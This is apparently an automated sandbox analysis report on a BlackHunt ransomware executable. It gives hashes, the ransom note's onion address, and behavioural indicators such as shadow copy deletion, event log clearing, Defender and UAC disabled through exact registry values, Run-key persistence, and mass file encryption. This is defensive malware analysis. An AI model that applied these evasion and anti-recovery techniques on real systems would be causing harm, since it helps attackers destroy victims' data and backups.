Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
144s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 22:11
Static task
static1
Behavioral task
behavioral1
Sample
4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe
Resource
win10v2004-20231222-en
General
-
Target
4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe
-
Size
707KB
-
MD5
94bcfc87f557e0955b93dd15f79315ed
-
SHA1
fea243bdbecf5e0064f36845093e7c8148915186
-
SHA256
4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3
-
SHA512
d5f2cea82f44fd43baf98c8c35ae549959f0efeb277cc0f83faac1e17570814d3cb2f8fdba900d87f9078941fce77d1f5bf72d61b011f95ae16bea785010c94d
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1m86vnh:6uaTmkZJ+naie5OTamgEoKxLWtUh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 12616 fsutil.exe 21452 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 20996 wevtutil.exe 21100 wevtutil.exe 21260 wevtutil.exe 20780 wevtutil.exe 308 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 12744 bcdedit.exe 12672 bcdedit.exe 21192 bcdedit.exe 21200 bcdedit.exe -
Renames multiple (3363) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 12832 wbadmin.exe 23424 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\P: 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened (read-only) \??\K: 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened (read-only) \??\V: 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened (read-only) \??\I: 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened (read-only) \??\O: 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened (read-only) \??\X: 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened (read-only) \??\N: 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened (read-only) \??\R: 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened (read-only) \??\U: 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened (read-only) \??\H: 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened (read-only) \??\Y: 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\L: 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened (read-only) \??\M: 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened (read-only) \??\J: 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened (read-only) \??\Z: 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened (read-only) \??\B: 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\W: 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened (read-only) \??\T: 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened (read-only) \??\G: 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened (read-only) \??\Q: 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened (read-only) \??\S: 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\A: 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\7-Zip\Lang\hu.txt 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\example_icons2x.png 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hu-hu\#BlackHunt_ReadMe.txt 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\cstm_brand_preview2x.png 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files\dotnet\swidtag\#BlackHunt_Private.key 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fullscreen-exit.svg 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nl-nl\#BlackHunt_Private.key 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\ui-strings.js 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fr-fr\#BlackHunt_Private.key 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files\VideoLAN\VLC\locale\is\#BlackHunt_Private.key 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\#BlackHunt_ReadMe.hta 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nl-nl\#BlackHunt_ReadMe.hta 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-fr\ui-strings.js 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\de-de\#BlackHunt_ReadMe.txt 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\new_icons_retina.png 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fr-fr\PlayStore_icon.svg 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-tw\#BlackHunt_ReadMe.txt 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\asm.md 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hu-hu\#BlackHunt_ReadMe.hta 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\images\example_icons2x.png 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\AddressBook2x.png 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\#BlackHunt_Private.key 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\vlc.mo 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ko-kr\ui-strings.js 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nl-nl\#BlackHunt_ReadMe.hta 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\share_icons.png 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\tr-tr\#BlackHunt_ReadMe.hta 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\cstm_brand_preview2x.png 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\#BlackHunt_Private.key 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\#BlackHunt_Private.key 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files\Java\jre-1.8\lib\cmm\#BlackHunt_ReadMe.hta 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\bbc_co_uk.luac 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\#BlackHunt_ReadMe.txt 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\de-de\#BlackHunt_ReadMe.txt 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\root\#BlackHunt_ReadMe.txt 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fi-fi\#BlackHunt_ReadMe.txt 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\#BlackHunt_ReadMe.txt 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_invite_18.svg 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations.png 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files\VideoLAN\VLC\plugins\demux\#BlackHunt_Private.key 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files-select\css\#BlackHunt_ReadMe.hta 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\edit-pdf-2x.png 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\#BlackHunt_Private.key 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\zh-tw\#BlackHunt_ReadMe.txt 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened for modification C:\Program Files\dotnet\LICENSE.txt 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\editpdf.svg 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app-api\dev\#BlackHunt_ReadMe.txt 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\css\#BlackHunt_ReadMe.txt 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\root\#BlackHunt_ReadMe.txt 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\root\#BlackHunt_ReadMe.hta 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\#BlackHunt_ReadMe.hta 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\organize_poster.jpg 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\#BlackHunt_ReadMe.hta 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\hr-hr\#BlackHunt_Private.key 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ca-es\#BlackHunt_ReadMe.txt 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\root\#BlackHunt_ReadMe.hta 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\#BlackHunt_ReadMe.hta 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\#BlackHunt_Private.key 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-down.png 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\de-de\ui-strings.js 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\management\#BlackHunt_ReadMe.txt 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_equalizer.html 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\it-it\#BlackHunt_ReadMe.txt 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 21264 25884 WerFault.exe 296 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6540 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1196 vssadmin.exe 11592 vssadmin.exe 21228 vssadmin.exe 6976 vssadmin.exe 10524 vssadmin.exe 3120 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 21772 taskkill.exe -
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 21760 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe Token: SeRestorePrivilege 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe Token: SeBackupPrivilege 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe Token: SeTakeOwnershipPrivilege 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe Token: SeAuditPrivilege 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe Token: SeSecurityPrivilege 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe Token: SeIncBasePriorityPrivilege 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe Token: SeBackupPrivilege 9132 vssvc.exe Token: SeRestorePrivilege 9132 vssvc.exe Token: SeAuditPrivilege 9132 vssvc.exe Token: SeBackupPrivilege 14220 wbengine.exe Token: SeRestorePrivilege 14220 wbengine.exe Token: SeSecurityPrivilege 14220 wbengine.exe Token: SeSecurityPrivilege 20780 wevtutil.exe Token: SeBackupPrivilege 20780 wevtutil.exe Token: SeSecurityPrivilege 308 wevtutil.exe Token: SeBackupPrivilege 308 wevtutil.exe Token: SeSecurityPrivilege 20996 wevtutil.exe Token: SeBackupPrivilege 20996 wevtutil.exe Token: SeSecurityPrivilege 21100 wevtutil.exe Token: SeBackupPrivilege 21100 wevtutil.exe Token: SeSecurityPrivilege 21260 wevtutil.exe Token: SeBackupPrivilege 21260 wevtutil.exe Token: SeDebugPrivilege 21772 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1756 wrote to memory of 4120 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 91 PID 1756 wrote to memory of 4120 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 91 PID 1756 wrote to memory of 4712 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 95 PID 1756 wrote to memory of 4712 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 95 PID 1756 wrote to memory of 856 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 93 PID 1756 wrote to memory of 856 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 93 PID 1756 wrote to memory of 5080 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 97 PID 1756 wrote to memory of 5080 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 97 PID 1756 wrote to memory of 404 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 99 PID 1756 wrote to memory of 404 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 99 PID 1756 wrote to memory of 548 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 101 PID 1756 wrote to memory of 548 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 101 PID 1756 wrote to memory of 4348 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 102 PID 1756 wrote to memory of 4348 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 102 PID 1756 wrote to memory of 2380 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 105 PID 1756 wrote to memory of 2380 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 105 PID 1756 wrote to memory of 3724 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 106 PID 1756 wrote to memory of 3724 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 106 PID 1756 wrote to memory of 3832 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 108 PID 1756 wrote to memory of 3832 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 108 PID 1756 wrote to memory of 1136 1756 